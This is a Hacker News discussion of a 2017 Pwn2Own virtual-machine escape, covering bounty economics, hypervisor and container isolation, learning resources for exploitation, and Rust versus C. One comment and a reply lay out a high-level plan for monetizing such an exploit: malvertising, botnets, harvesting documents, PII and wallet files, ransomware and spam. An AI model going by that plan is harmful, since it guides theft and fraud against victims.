Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Virtual machine escape fetches $100k at Pwn2Own hacking contest (arstechnica.com)
403 points by hcs on March 17, 2017 | hide | past | favorite | 156 comments


So if you were using a use-once-and-destroy VM to do some Edge security testing, they could blow threw everything and get you anyway. The fact that there are vulnerabilities in each of three layers they needed to hit is unsurprising, but having one guy find all three is more incredible to me than Barcelona's recent come back against PSG.


Yes, this has to be one of the most impressive - and scary - things I've read in a while. Fantastic work by the team, and thank goodness there's security competitions like these to work as a rewarding outlet for their extreme talents.


That comment makes me wonder: would funding more of these with public money be explicitly worth the savings in avoiding attacks?


I'd rather see this money used for increasing software security through all layers. [1][2]

See, all these vulnerabilities started as major or minor bugs. And these originate from somewhere. While 100% bugfree software may be too hard to be worth the effort in most applications, there is a huge difference between the ideal state "the first exploit hits you hard, and after two or three more severe bugs in your software, you are out of business." Instead, we have "you can 'loose' huge amounts of data every few months and are still in business." And no regulator, no expert in a law suite, actually nobody, wants to have a look at your source code anyway. Even if you don't hide it through SaaS or other means, almost nobody asks for the source. [3]

Instead, public money is used to declare "cyberwar" and to buy zerodays - which creates an incentive for people to keep their findings private, instead of reporting early on. And more imporantly, these create an incentive to put in such bugs in the first place. [4]

[1] See also https://news.ycombinator.com/item?id=13772293

[2] audits, bug bounties (every bug, not just obviously-security-related bugs), better static analysis tooling and improving type systems and programming languages as a whole, donate to projects like OpenBSD and Mozilla / Rust, etc.

[3] ... unless it is about copyright. But I've never seen such a request in a software-security related incident.

[4] An attacker doesn't even need to establish a full-blown backdoor. They can just contribute some code with a missing or slightly-wrong check, and see how to exploit it later on, after enough time has passed.


We should also invest more in changing "100% bugfree software may be too hard to be worth the effort in most applications". Ultimately, everything else is just stop gap.


Good point!

My first reaction was: This is insane. Nobody is perfect. Let's try to reduce the bug rate to 1 bug / 100,000 LOC and we have achieved more than we can hope for.

However, thinking more about it, if you have a system with 1 million LOC and reduced your bug rate to 1 / 100,000 LOC, this means you need to fix 10 more bugs and you are 100% bug free. This doesn't sound infeasible at all. (ALthough it may be hard.)


many companies have bug bounty programs where they will pay people who discover bugs.

I've read criticism of Pwn2Own that argues that some people will find an exploit and save it for the competition rather than disclosing it to the company. This would give time for the exploit to be discovered by others who would use it.


They are basically already funded by public money, problem is just that the vulnerabilities found won't make it back to the vendors until they are burned.

- https://news.ycombinator.com/item?id=13810015


> thank goodness there's security competitions like these to work as a rewarding outlet for their extreme talents

$100k doesn't sound very rewarding.


In that case can I borrow $100k?


Y'know Y Combinator? That Startup Accelerator that runs this site?

They will just let you borrow $100k (well, $120k) if they like you and your idea. See http://www.ycombinator.com/ for more.

Snark aside, assuming the contestant took the whole year to work on the exploit, the chance of a $100k payout is small compared to the risk of not actually finding the exploit, combined with the fact that they could be making twice that working at a place like Facebook or Google.

Also, you'll note that the Ars' paper doesn't talk at all about the contestants to the contest who's hacks failed to succeed.


If you want to make the most money doing security research, your best bet is going to be finding people who will pay you to do security research. You get paid even if you don't find anything!

And $120k in exchange for equity is a sale not a loan or a gift.


Perhaps they came across the exploit under different circumstances? Perhaps they've exploited it themselves in the real world, but the lure of the $100k prize is worth giving-up-the-goods?


It's a fair point - bug bounties were controversial when companies started doing them, and even then, by reducing it to monetary terms, economics states they are only as effective as their payout.

For example, in the so called "Cloudbleed" writeup, it was evident that Cloudflare was leaking authorization headers from Uber. If the security researcher who discovered it had far fewer morals, instead of reporting the issue to get it fix, it's possible they had the power to change the bank account/whatever that each Uber driver gets paid into, to an account under the researcher's control.

For all their hard work and honesty, the security researcher (aside from the benefits of an awesome job at Google), won a grand prize of... a T-shirt from Cloudflare (hopefully it said "I broke the Internet and all I got was this Tshirt").

Maybe the pwn2own exploit did come from different circumstances. In that case, someone was able to reuse previous work and make an easy $100k. (If you're jealous of that, residuals in Hollywood are gonna make you move to LA.) Whatever portion of that $100k that came from VMWare, it's cheap for VMWare to know about this bug and to be able to close it, when their business model rests on their security claim that the guest cannot escape to the host.


>economics states they are only as effective as their payout.

It's a bit more complicated than that as the value of the bug bounty only has to be greater than the lowest economic value to all of those that are aware of the bug to be effective.

That incentive, even though small, dramatically reduces the size of the total number of individuals who will know about the bug before it's disclosed. Since the set of people who are willing and able to exploit the bug for gain is small keeping the number of people who know about an undisclosed bug small reduces the probability of an overlap.


This tells that number of vulnerabilities in each layer is big so a single team can discover some in few months.


Or they're clever guys and gals who got a bit lucky? Its hard to say what the case is without a more comprehensive audit of the codebases in question.


Being someone who uses Qubes OS, seeing cracks that allows a virtualised system to break out to the is scary. After all, the entire security model of Qubes OSis based on the fact that it's not possible to break out from the VM's.

I'm really glad these guys valued their reputation higher than the extra money they could have gotten from selling these exploits on the blank market, but this makes me wonder how many such vulnerabilities are available that hasn't been published.


> seeing cracks that allows a virtualised system to break out to the is scary

Hate to break this to you, but it's been shown time and time again that due to how caching and CPU pipelining works in modern processors, any "isolation" including full-on VM which is not "physical isolation" is leaky: https://pdfs.semanticscholar.org/e544/00824814fed2ef52bb8415... (overview of attacks)

Here is a particularly nice paper (proper methodology, well-explained intro, etc.) showing one example (a more or less regular cache timing attack, but with actual private info extraction from host, etc.): https://arxiv.org/abs/1702.08719 - these come up several times a year for various VMs, etc.


And even physical separation might not be enough due to EM radiation and power usage.


Those problems can and have been resolved with appropriate power filters and shielding.


It is many orders of magnitude harder to get data from a computer that is in the vicinity than from one VM on the same machine to the host or another VM on that same machine.


I agree, but VM security and exploits also get orders of magnitude more attention. Besides, physical separation does not just apply to the data-center. Consider EM radiation from phones and laptops.


Indeed, all commonly-used hypervisors have had host escape vulnerabilities reported over the years, including Xen as used in Qubes - see e.g. http://blog.quarkslab.com/xen-exploitation-part-3-xsa-182-qu...

Of relevance to Edge exploitation, Microsoft are currently working on a Qubes-like sandboxing model for Edge, based on Hyper-V (though it looks like it'll be aimed towards enterprise customers rather than consumer): https://blogs.windows.com/msedgedev/2016/09/27/application-g.... Will be interesting to see if that's part of the challenge in Pwn2Own 2018. Somewhat surprisingly, Hyper-V wasn't successfully exploited at this year's contest.


Why are you surprised Hyper-V hasn't been exploited? Did it happen in the past?

And this is VMware Workstation, not ESXi; which many people on this thread seem to be confusing.


This is the first time Hyper-V has been offered as a target in Pwn2Own, but it's had its share of host escape bugs over the years. The latest one was patched in this month's updates, just before the contest.


Actually, the bug was in the wmware tools, which may be available on your vm's handled by esxi.


That's not how it works I'm afraid.

Otherwise if I installed those VMware tools on my physical computer and exploited them... to where do I escape? Alternate reality?

:-)


The flaw is to think that security can ever be 100% tight.

Not ever physical security is organized like that.

At best you can design for a certain level of determination of the attacker, and thats it. Any attacker that is more determined will eventually get past.

Question is what are you protection against.

Your garden variety identity scammer?

NSA?

Sometimes it feels like _sec has developed NSA myopia.


How does someone learn this skill? I get that it obviously takes a ton of work, but how do you even prepare/study for (whatever it takes work to do) in the first place? The intuition required seems so different from what my intuition of computer systems would allow even imagining.


> How does someone learn this skill?

Broadly, the basis for this is an understanding of how computers actually work - if you learned about it in school, the class would have started with Von Neumann vs Harvard architecture graduating to building a CPU from scratch (well, logic gates, anyway, possibly with Verilog), and followed by another class about writing an operating system; kernel, drivers, then a (rudimentary) user land - basic implementation of syscalls, a glibc-type library to make syscalls, basic shell on top of that. That knowledge and a perseverant attitude (getting exploits to work can involve trying to debug code with zero feedback).

As far as this hack goes, broken down into three separate pieces, the exploits should be understandable as being sandbox escapes, but for three different sandboxes (Browser, OS, VM). Sandboxes are implemented in code, the code is going to have bugs, and exploits are "merely" a case of figuring out how to use the bugs to your advantage. No one's made a totally hack-proof sandbox. Not Apple (this year's contest featured a touchbar takeover), not Google (Chrome's fallen in years past), apparently not Microsoft or VMware (nor Linux/Canonical/Ubuntu, either).

If you're interested in learning about this stuff, microcorruption is an online security CTF "game" that starts off fairly easily. https://microcorruption.com/login

The contest part of SANS' holiday hack challenge is over, but the game itself is still up. https://holidayhackchallenge.com/2016/

Rootme is another one. https://www.root-me.org/

(I'm sure there are many more out there, those are just the 3 that came to mind.)


Can you show me where the touchbar takeover is? That seems really interesting, especially if they took over the watchOS chip in the touchbar.


A good security class will give you the principles. Look at CS 161 at Berkeley:

http://www-inst.cs.berkeley.edu/~cs161/sp16/

Any bug is a potential exploit. That exploit may not get you very far but it can be chained with another which will get you further.

The principles are almost elegant. The details are mind numbing. Luckily, common exploits get collected into metasploit:

https://www.metasploit.com/

Script kiddies (Annoyingly Persistent Teenagers to quote Nick Weaver) generally use toolkits like metasploit.


I recently watched and enjoyed this:

https://www.youtube.com/watch?v=xkdPjbaLngE

where he describes the hack of the Nintendo Switch, because they shipped an old version of Webkit. It's pretty impressive to see how "just" Javascript can jump from browser to native.


Really excellent video.

The material is good but also the guy shows an amazing teaching technique .

I wish commercial tutorials producers would put such care to their courses.


Thank you. I enjoyed it too.


I have two recommendations that anyone with a CS degree or equivalent knowledge should be able to jump into with 0 other training, and come out with a solid understanding of how to find vulnerabilities and exploit them.

* Hacking: The Art Of Exploitation

This is an excellent book. It's lab-oriented, so you will be getting hands-on experience with reverse engineering and exploiting software.

And: http://opensecuritytraining.info/

They have a graph of classes somewhere, and you can see "Oh I want to get to advanced exploitation, what should I take?" and you just follow along. Start with intro to x86, intermediary x86, then move on to the software vulnerability classes, life of a binary, etc.

Really, with only these skills alone, you can self-teach the rest of the way. There's a book called The Art Of Kernel Exploitation, if I'm remembering right, that would take you into a more advanced but more niche area, and it's really up to you where to go after you get the basis (just like with programming).


I too would like to know. One recommendation I saw in regards to learning to hack stuff like the Nintendo Switch is, first learn to write a kernel, and also learn about compilers. Also, personally I've been considering working through Bunnie Huang's "Hacking the Xbox".


> Also, personally I've been considering working through Bunnie Huang's "Hacking the Xbox".

Do so. It was the first Bunnie book I purchased, and now I'm a lifelong fan owning all of his work.

If you haven't read his most recent book, "The Hardware Hacker", it's a must read.


Just finished reading "Hacking the Xbox," per your suggestion - agree that it's quite good at explaining the process. The actual presentation does a good job of condensing what I imagine was an arduous adventure. Thanks for the recommendation.


So glad you enjoyed it!


Look at all the historical claims and the techniques involved. It takes a lot of tenacity and trying things that shouldn't work but on extremely rare occasions somehow do.

A lot of them publish source code that demonstrates how the exploit worked, plus when paired with an open-source project that has a vulnerability you can see how that matches up to the target.

There's a large toolbox of techniques to learn, but in this fashion they're surprisingly well documented. Using these techniques you can find other exploits if you're creative.


Hacking, 2nd Edition is a great introduction.

https://www.nostarch.com/hacking2.htm


an experienced programmer can simply read through the code and see edge cases that migt be explotable. often decompiled/asembled code and use debuggers.


You don't learn, you gain experience for decades


A set of exploits like the 3 described could be worth quite a bit on the open market. I'm surprised how low the bounty was for a full vmware escape starting from a browser. Surely there are other exploits like this out in the wild under government lock and key.


Do you really believe that this team has the skills and knowledge to find these bugs and construct working exploits for them, but then don't understand the exploit market? Or, that they act against their own best economic interests?


> but then don't understand the exploit market? Or, that they act against their own best economic interests?

Maybe they're just ethical by nature. If I could make lots of money by breaking the law or doing something un-ethical I (and in fact the vast majority of people) still wouldn't do it. Money isn't the only motivating factor.

So it is very well possible these exploits would have been worth more on the open market and still the team decided to work on this in a white-hat setting because they are simply good people.


They could sell it to the US Government.


That would not be ethical either.


Given the current administration and political climate giving it to the government would be even more unethical. Specially because criminals don't have the funds the NSA does, and they are 100% guaranteed to get away with any wrongdoing


I think any kind of release and hoarding exploits without doing what's possible to get the holes closed is un-ethical no matter who the recipient is, there is not much in terms of shades of gray there.


Yes but it would be legal.


> that they act against their own best economic interests?

If you consider just your own "best economic interest", a lot of "jobs" like drug dealing, prostitution, fraud etc. are good choices. Morals, not wanting to go to jail, and a concern for your own physical security are non-economic factors that make these bad choices in most people's view. Blackhat hacking falls pretty much in the same category; selling exploits may perhaps be technically legal, but I wouldn't bet my paycheck that you couldn't be put behind bars for aiding and abetting in a criminal offense or similar.


Best short term economic interests, maybe.

But building a reputation as brilliant whitehat surely confers significant economic benefits as well.


It can be in your long run interest not to sell attacks on companies on the open market. That is shady stuff and not worth it for many people.


These guys are definitely acting against their own best economic interest. Good for them.


That's what I was thinking. $100k for this sounds low.


Say you have such an exploit. How do you propose making money from it? Exactly what steps would you take?


Find the sketchiest ad networks (http://krebsonsecurity.com/ has lots of reading and links). You'll need to front some cash to buy bitcoin to buy time on those ad networks. Put your "ad" consisting of this exploit on the network, which then manages to root both the machine visiting the web page, and the VMWare host machine. Use this to build a botnet.

Given how juicy the VMWare escape is, I'd also just start dumping ~/Documents/ on any machine that you escape out from the guest OS on. Who knows what they'll have?

It's mostly going to be boring, so you'll want to automate this, but infect enough machines and you'll hit easy scammer pay dirt- PII on millions of people, despite regulations that prohibit doing this. Credit cards, social security numbers, phone numbers, addresses. From there, it's just a felony or two away from either stealing people's identities yourself, or selling the list in a scam forum (for way more than $100k). There are all sorts of juicy data that you might find; VMWare isn't something that most people run, and maybe there are other monetizable bits of data.

Assuming you don't find the scammers' wet dream in stolen data though, you're reduced to trying to monetize from other ways. Desktop popups, DDoS for hire, cryptolocker-style data-ransom, using the machine as a host for sending spam.

It's 2017 and it really sucks that spam is still such a huge problem (Gmail's spam filter is only so effective because Google's team works hard, and is good at their job, not because the problem has gone away). As a spammer though, this means it's still lucrative enough that there's some non-zero amount of money to be made. Due to the VMWare escape involved, you'll have fewer problems with machines in your botnet going offline (how often do you reimage a VMWare host compared to the guests on it?) and can charge more money to use it too.

There are established scammer networks that can already monetize a botnet and selling your botnet and its capabilities to them might be easier than monetizing yourself, but at some level in order to make money you start getting some serious exposure that will land you in prison for years if you get caught, plus you'll eventually start working with scary people that will kill you if it suits them.


I think you're vastly overestimating the number of VMware backed browsers as well as the money to be made in a botnet. As well as the effort in actually setting all this up and maintaining opsec.

I'm also not convinced a VMware escape is something people get killed over. The leaked "Hacking Team" data shows exploits aren't worth that much more on the market (iOS being a big exception).


You forgot to automatically copy any wallet files you find.


There are various security broker companies that governments work with. An unscrupulous pentester could find one, email them, and ask them if they're interested.

The trouble would be how to prove the exploit works without also revealing how it's done. The best bet would be to demo one or two out of the three exploits required to work, then talk business in exchange for the third.


Business transactions between parties that don't trust each other is a solved problem: escrow.


Does escrow really work with secrets like this? The buyer receives the exploit and claims it doesn’t work. The seller claims it does. The money is still in escrow. How do you proceed? The escrow agent is getting a commission, they should not have access to the full secret. It’s really hard to find an escrow agent who has the skills to assess an exploit and whom both the buyer and the seller would trust not to leak it or use it for their own benefit.


You could have the inspection done by an independent.

Anyway, it's been done before by guess-who:

https://www.mitnicksecurity.com/shopping/absolute-zero-day-e...


Does escrow really work with shady black hat deals like these?


Depends on who the buyer is and yes, it does work, there are even specialized marketplaces. You'd still be dealing with the devil but you very likely will get paid.


Perhaps they think the exposure they'll get from this is worth it.


While crafting the exploit may seem like the hard part I can imagine trying to market it and get paid can be very difficult too.


For me $100k sounds almost like a joke... specially when it puts billion-dollar companies to shame.


It's not high because it is VMware Workstation, not ESXi.


Impressive.

Is there consensus on security bad/best practices when it comes to VMs and containers? I mean if even established VMs/Hypervisors can't save you, what prospect is there of containers to actually contain anything?

Maybe POSIX chroot jails aren't that bad after all? Because, like, they're the simplest thing that can possibly work, and don't come with the complexity of VMs and Linux containers/namespaces; and if they turn out to be vulnerable you'd be able to switch to another kernel (BSDs)?


You have bugs in every (mainstream) kernels. With them, you can elevate your privileges to kernel level, and once you've done that it's game over.

There is no reason to believe an additional layer (a VM) will always protect you (at least given how they are also written in unsafe languages for now). However there is no reason to believe it will in average makes things worse, and every reasons to believe it will in average increase your security.


Please read this article[1] about how exactly chroot jails function as a security measure.

If you have a process that's already not running as root, all a chroot jail does is decrease the attack surface a bit by giving that process a more limited view of the filesystem. As soon as you run something as root, or give that chroot process access to a vulnerable setuid-root binary, it can escape. An exploit anywhere in the kernel (not just in the implementation of chroot), could lead to the system being taken over.

Chroot jails are easy to reason about, but they don't really help you if you're, say, studying malware.

[1]: https://access.redhat.com/blogs/766093/posts/1975883


"Is there consensus on security bad/best practices when it comes to VMs and containers?"

Yes - it's called simplicity. Fewest moving parts possible. Limit attack surface to the smallest amount possible.

You can pursue this at every layer of the stack and at every layer of abstraction - it should be a primary design philosophy that informs every system you build.


Basically the VM is sandwiched between the host and parent OS. With a full VM you have a separate kernel. With containers, like Docker, you share a kernel.

The VM is then considered more secure because it adds that extra layer between them... but is it? It's just more code - more code, more problems.

The more effective solution is to simply harden the kernel of the host system, and then use a lighter solution like docker. Grsecurity + Docker seems like a solid fit to me, and you can mash another layer like Apparmor on top. It is very rare that I see a kernel vulnerability that would not be entirely mitigated by Grsecurity, or otherwise made far more costly.

The point is to stop adding layers on top and instead to focus on security that lower, trusted base.


Title misleading: virtual machine escape from a web browser, all the way down to host machine.


As someone said in a comment: "Breaking out of the Alcatraz, and then breaking into Fort Knox right afterwards!"


Dunno, seems pretty good. I'm much more impressed by escaping the virtual machine than a microsoft browser.


Makes for a better movie title. I mean who'd pay to see Escape from Microsoft Edge?


Misleading in a way that makes it seem less impressive than it actually was.


Really, they escaped from two virtual machines, the JavaScript VM and the VMWare VM. Maybe give them half a VM-point for breaking the confines of the Windows process (if you take your OS textbook seriously, a process is an abstraction of a computer, so sort of a VM).


Ideally that process is a jail. If Edge is anything like Chrome, it has dropped privileges for that process and that process is just a renderer.

https://seclab.stanford.edu/websec/chromium/chromium-securit...

Read this as I'm very impressed by the exploit.


One of those "VMs" gets escaped from all the time. The other is made by VMware.


One of them has plenty of help from the hardware and has a pretty limited feature set.


> You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes.

~Theo de Raadt

http://marc.info/?l=openbsd-misc&m=119318909016582


This is why we need rust. Has Windows and edge and VMware used rust, these bugs wouldn't have happened. Rust is a game changer with it's borrow checker.


I love Rust too, but while it likely would have prevented these three bugs, there are many other classes of bugs caused by poorly designed interfaces/abstractions/protocols, misunderstandings, "valid but wrong" logic mistakes, unanticipated interactions, etc.

Let's not make magic bullet statements about technology. It's a good way to scare people away...


It likely would prevent the vast majority of bugs that are actively exploited in security breaches.

Sure, bad logic bugs happen of course, but more often than not they result in bugs relating only to their own area and often somewhat limited in scope. They're also usually a fairly significant mistake that's often times easier to see - not necessarily all the time, but I'm probably more likely to catch a logic bug in a code review than I am a memory issue beyond a missing free.

Memory bugs however are much nastier - even a minor mistake can result in a complete takeover of the system as manipulation of the instruction pointer basically means game over and there are many ways to get that with only a little memory manipulation - blow out the stack until you overwrite the return address, overwrite vtables on the heap, overwrite function pointers, etc. Even a minor off-by-one can result in total exploitation in some scenarios.


> while it likely would have prevented these three bugs

Isn't that the point of the parent's comment?


I think the point is that Rust fanboy will repeat same thing for years "all security bugs would have been avoided if Rust was used" and when first security issue will be found in Servo or other Rust component(maybe the kernel some Rust devs work on) then Rust reputation will suffer, I see tons of article and blog posts m most of them made to slap the annoyng fanboys that repeated same thing. Btw if they would have used C# then those 3 bugs would not have happen, the thing is that for some work cases you have to do unsafe stuff so C# as Rust has a way to run unsafe code so bug would have happened especially in some low-level code like for a JIT.


> I think the point is that Rust fanboy will repeat same thing for years "all security bugs would have been avoided if Rust was used"

Complete hyperbole. All anyone says is that Rust prevents a class of security issues related to memory access.


OP is correct in saying Rust would have prevented these specific bugs, so I don't understand why you're trying to dismiss them as a "fanboy".


I am 99% sure that OP did not checked the code and made sure that Rust could have been used there without using unsafe, so maybe you could only say "maybe Rust and any other memory safe language would avoid that issue" but since is code related with VMs and JIT you may have use the unsafe things in those languages so maybe it was not avoidable.


If the type of bug is use after free, double free, race condition or uninitiated memory - Rust would have dealt with it.


And if the code was not part of an unsafe section of Rust code. I have nothing against advocating for your favorite software but if you do it wrong by "omitting" things it will backfire, as a Linux user I seen this thing happen, you get some fanboy convincing people to use Linux, usually Arch because that distro attracts fanboys then the new user finds the ugly parts that were not advertised and runs screaming.


This is specious reasoning. You have to go out of your way to write unsafe broken code. The default in Rust is for memory safety. Yes, someone could theoretically be using an unsafe block and raw pointers to manipulate a memory buffer. But they probably aren't, because that's generally pretty stupid unless you're implementing a higher-level wrapper around the buffer, which very few people do because there's generally already a wrapper that does what you want (often provided by the stdlib). And even if you are, the unsafe code is contained in a very small area which makes it much easier to review for safety.


I was talking about the low level code like in this case where you interact with the kernel, for calling kernel/OS functions you will have to pass pointers and buffers around,I am not sure if you can wrap the kernel functions without making things slower by adding indirection.


For any call that takes a raw pointer and a length, you can create a trivial wrapper that takes a &[u8] or &mut [u8] instead in order to make it safe. And you probably should do that, because you don't want to be sprinkling `unsafe` throughout your entire codebase. If you're really worried about indirection, you can also mark these inline, but they're small enough that the compiler would probably inline them anyway.


So, instead of making every thread about every security issue ever a lament for how much better the world would have been if everything was written in rust: Where is the rust based OS that is in wide deployment because of its superior performance and bug free nature? It should be a walk in the park to power to world dominance with such a huge difference from the established order.

Having the world re-written in rust is roughly the same as having linux on the desktop everywhere. It so far hasn't happened and what the world will look like once it does is anybody's guess, some classes of bugs will disappear, quite possibly. Other classes of bugs may then become more dominant. If rust automatically meant 'bug free software' that would be one thing but there are many classes of bugs and quite a few of those classes will lead to security issues.


>...same as having linux on the desktop everywhere. It so far hasn't happened and...

It kind of has, though Linux contributed kernel, not UI. And "desktop" is mobile phone. It's not what everyone had in mind when we talked about Linux on desktop though.

But to answer your point about Rust, the reason there is no such OS is that security in itself is not a prevailing factor when people choose OS. Which doesn't make gp's argument false, it just shows why his wishes about Rust in critical software will probably never be granted.


The linux on the desktop statements were aimed at displacing windows on the desktop in its traditional role in businesses and homes, something that hasn't really happened.

What has happened is that a new class of devices was created that uses linux at the core, but that's not the desktop. (Happy 'linux on the desktop' user here since a very long time, roughly since it supported 'X' and my trusty SGI Indy got too slow to stay with the times).

Anybody that wants rust to replace C (or any other language) would be better of coding than complaining.


I agree, I only wanted to point out the irony of "linux on desktop". It actually happened* (MS failed big time), but not the way it was meant.

You had your own SGI Indy? I only had temporary access to one, but loved it at the time...

EDIT: it happened at home (mobile), not so much in business.


> You had your own SGI Indy?

A whole bunch of them in fact. The only thing surviving from those days are the keyboards. Indestructible.


Windows might have been the OS with the overall top market share at one point (depending on precisely what you include in your measure), however measuring only "traditional" desktop/WS and server makes no sense anymore, and even Android alone has now nearly caught it: http://gs.statcounter.com/os-market-share

If you consider all the consumer electronics with a GUI that run under Linux, it is probably even "worse" (well, worse for Windows...)

You could argue that all of that does not make a unified platform, but neither does all the Windows (although the fragmentation might be somehow less important there)

Believing that a system/techno can take over the world in a year can be stupid. Believing that market dominance can't change in a decade or 2 (even if that's driven by usage changes), equally so.

(I was kind of surprised when MS started to completely switch their strategy and be furiously OS agnostic in tons of area. When you look at the figures, they actually did not have the choice if they want to survive the next several decades, and they probably would not have done that if they had...)


While Rust can reduce the chance of these kinds of bugs, it cannot completely prevent them.

For instance, the browser Javascript VM will most likely use some form of JIT, which works by generating machine code at runtime, and then executing the generated code. Nothing in the Rust language can prevent a bug in the generated code from being exploitable.

And even within pure Rust code, developers can and will do unsafe tricks to get the last few percent points of speed (for instance, storing flags in the least significant bit of pointers). While Rust requires these parts to be marked with "unsafe" (which allows reviewers to focus on them), it cannot prevent bugs caused by these pieces of code.


This seems like a strawman. "Rust prevents these bugs", "Oh, but Rust doesn't prevent all bugs!".


Buffer overflows and uninitialized memory are not only possible in Rust (excuse me, "unsafe Rust", as if that were a different thing), if Rust gains any genuine traction and widespread use it is very likely they'll exist "in the wild" and as exploits waiting to be discovered.

Rust isn't a panacea or cure-all, and its fans are doing more harm than good (for Rust) by their zealotry on this matter, in my view.

And just to make it very clear: I do like Rust. It has some great features that I can envision having an excellent (and superior to C or C++) case for using in certain kinds of systems and application programming. But I'm not convinced these features are as much of a safeguard as some apparently are.


> (excuse me, "unsafe Rust", as if that were a different thing)

They are - there is a world of difference between the two. From a security perspective the ability to audit unsafety explicitly is massive. Right now we rely on intuition and fuzzing at large scale to try to cover massive parts of a codebase. With explicit unsafety you can limit your checks to a subset of modules, rather than the entire program. Massive, massive difference that can not be understated.

> if Rust gains any genuine traction and widespread use it is very likely they'll exist "in the wild" and as exploits waiting to be discovered.

Naturally. But this certainly isn't worse than where we are now - where languages make 0 effort to be safe, or have far too much historic baggage to do it meaningfully.

Beyond that, rust's attitude towards security is pretty positive. Rust has been quick to adopt LLVM sanitizer support, fuzzer support for AFL and cargo-fuzz, and new mitigation techniques such as safestack. With rust's updates coming out quickly you get access to these in a matter of weeks/ months as opposed to years.

Rust isn't a cure-all, no one should be calling it one. But your response is overly pessimistic.


I mostly agree, but I think pessimism and skepticism are very much warranted in the area of security especially. Perhaps doubly so with new languages, and even more with new languages that purport to be safe(r).


Being critical and pursuing the issue is one thing. You can find lots of work on formally verifying rust code as well as it's type safety online.


That is definitely why we need to stop using C. It's beyond ridiculous.


Not as ridiculous as the costs of rewriting monstrous codebases that thousands of people worked on over many years. Let's not lose our sense of scale.

Businesses love money more than they love C, if rewriting made economic sense, it wouldn't need to be lobbied.


It doesn't make economic sense because VMWare and Microsoft don't have to pay out of pocket if a box in a datacenter is compromised and data is leaked because of bugs in their VMs and kernels that are only possible because of C.

This is like hiring somebody to build a bridge, it falling due to incompetence killing hundreds of people and then having nobody suffer any consequences. "Eh, bridges fall, what can you do."

Make people pay for buffer overflows and C is gone tomorrow.


> This is like hiring somebody to build a bridge, it falling due to incompetence killing hundreds of people and then having nobody suffer any consequences. "Eh, bridges fall, what can you do."

You can't really use these analogies in a security context, because real world engineers aren't liable if their designs fail due to sabotage, overloading or other unexpected conditions outside the standards they designed to.

Software is different to real world 'analog' engineering in that a single very small mistake can bring down the whole thing. Most civil engineering designs would be riddled with small mistakes like that, but the overall system has (multiple layers of) factors of safety built in and the ability of other parts to compensate. You can see how concrete buildings in war zones (even places with shoddy engineering standards to begin with) can take large fractions of their structure being shot away before failing. A software vulnerability though is like finding just one perfect place where a single bullet could bring the whole thing down.


Good point - some rights can't be signed away by contracts and license agreements, no matter what those say. For example automobile manufacturers can't hand you a sales agreement that exempts them from (a whole list of) responsibilities, because governments recognize a public interest and pass laws insisting on safety standards, availability of parts for 20 years, etc, etc. Govts should now catch up with the modern world and recognize the public interest in computer infrastructure safety; by ensuring that IT can't license away its responsibility to take all reasonable measures to reduce risk (thus opening up liability as well.) At some point, using Rust - in many cases - even if it's more expensive, will be such a reasonable safety measure enforced by tort law or statute. Not quite yet, perhaps, because the language is young. But soon.

The EU is now taking Google and other corporations to task for their user agreements (licenses), to try to get them into compliance with consumer law there. It's a start, I suppose. https://www.theregister.co.uk/2017/03/17/europe_facebook_goo...


Make people liable for software bugs and IT will be gone tomorrow.


There will always be software bugs. What I'm trying to say is that people should be made liable for avoidable bugs due to incompetence or ill-placed personal preferences ("Real programmers write in C!11").

There are times when C is unavoidable, unfortunately, but when somebody chooses a technology regardless of better, safer alternatives, "just because", they should be made liable, absolutely.


It's a matter of economics already.

There are safer, better alternatives for almost everything we do. But economy dictates that we end up with a compromise. Rust would be just another compromise, slightly different stage, no huge difference and potentially a huge cost.

Silver bullets in software development do not exist, rust is no exception to this and the irrational hyping of rust as being a silver bullet actually has the opposite effect.

If rust is that much better at all aspects of software development (and not just in preventing one class of bugs) then it will find mainstream adoption. But you don't get that effect by ramming it down other people's throats, you get that effect by showing it in practice. And this is where rust - at least so far - is underwhelming.

Also, and this is another point of irritation with me, the rust community makes it seem as if theirs is the only language that will avoid this kind of bug, which is far from true, there are other platforms / languages with far wider adoption that have these traits as well.


I'm not promoting Rust, nor have I actually written anything in it. I do think though it's a step in the right direction.

> But you don't get that effect by ramming it down other people's throats, you get that effect by showing it in practice.

I disagree. I've seen many C programmers who think that C is the be all end all of programming languages. Those people will not be convinced by showing them another technology that is better in practice. The fact that it's actually unbelievably hard to write correct software in C is somehow a point of pride for many people, though I speculate that few of them can actually follow through.

Of course there will always be logic bugs in software, even with formal systems and whatnot (i.e. bugs in the specifications). But memory bugs and the resulting security exploits could in many cases be a thing of the past already.

Many industries have similar regulations, i.e. seatbelts in cars. If somebody dies because of a faulty or non-existing seatbelt, there will be consequences. If somebody dies because they were talking on the phone and the car didn't prevent it, well, you can't control everything.

Is this a buffer overflow? Why was this written in C? No good answer - pay up.


> There are safer, better alternatives for almost everything we do. But economy dictates that we end up with a compromise. Rust would be just another compromise, slightly different stage, no huge difference and potentially a huge cost.

I think the argument is that the economics need to change. People need to stop being irresponsible - we need liability when someone is negligent, just like in any other engineering discipline.

> Silver bullets in software development do not exist, rust is no exception to this and the irrational hyping of rust as being a silver bullet actually has the opposite effect.

I keep seeing this, and yet I have not once seen anyone call it a silver bullet.

> Also, and this is another point of irritation with me, the rust community makes it seem as if theirs is the only language that will avoid this kind of bug, which is far from true, there are other platforms / languages with far wider adoption that have these traits as well.

Show me another language with no garbage collection, memory safety, C/C++ level performance that has been anything other than academic.


> I think the argument is that the economics need to change. People need to stop being irresponsible - we need liability when someone is negligent, just like in any other engineering discipline.

I totally agree with that and have been a long time proponent of liability for damage caused by software bugs.

But that would have to be all bugs, not just some classes of bugs.

> Show me another language with no garbage collection, memory safety, C/C++ level performance that has been anything other than academic.

D.

And by the way, rust is only 'memory safe' as long as you don't disable the safety mechanisms, so I think 'memory safe by default' would be a better way to describe it.


> I totally agree with that and have been a long time proponent of liability for damage caused by software bugs. But that would have to be all bugs, not just some classes of bugs.

Why? That goes against everything we've done to categorize bugs - we do not treat all bugs the same, and we would not consider all bugs to be due to negligence.

> D.

Only with a garbage collector or a 'safe' annotation. Rust has the opposite - a safe language by default.

> And by the way, rust is only 'memory safe' as long as you don't disable the safety mechanisms, so I think 'memory safe by default' would be a better way to describe it.

That's fine, memory safe by default is an acceptable way to refer to it. It's worth noting that I have written thousands of lines of rust code and never published code with a single line of unsafe. None of my projects have required it. So 'by default' is pretty powerful, since I've never ever needed to opt out.


